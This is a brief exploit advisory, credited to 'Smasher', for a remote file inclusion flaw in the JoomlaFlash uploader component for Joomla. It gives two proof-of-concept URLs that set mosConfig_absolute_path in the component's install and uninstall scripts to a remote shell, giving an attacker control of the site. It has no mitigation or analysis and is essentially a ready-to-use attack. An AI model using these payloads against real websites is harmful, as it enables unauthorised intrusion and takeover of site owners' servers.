JoomlaFlash Component Multiple Remote File Inclusion
Autore: Smasher
Sito: http://warwolfz.altervista.org
Tipo: Remote File Inclusion
Rischio: Alto
A remote attacker can gain access to your website throug a Remote shell
inclusion.
PoC available:
http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?
Regards.
Smasher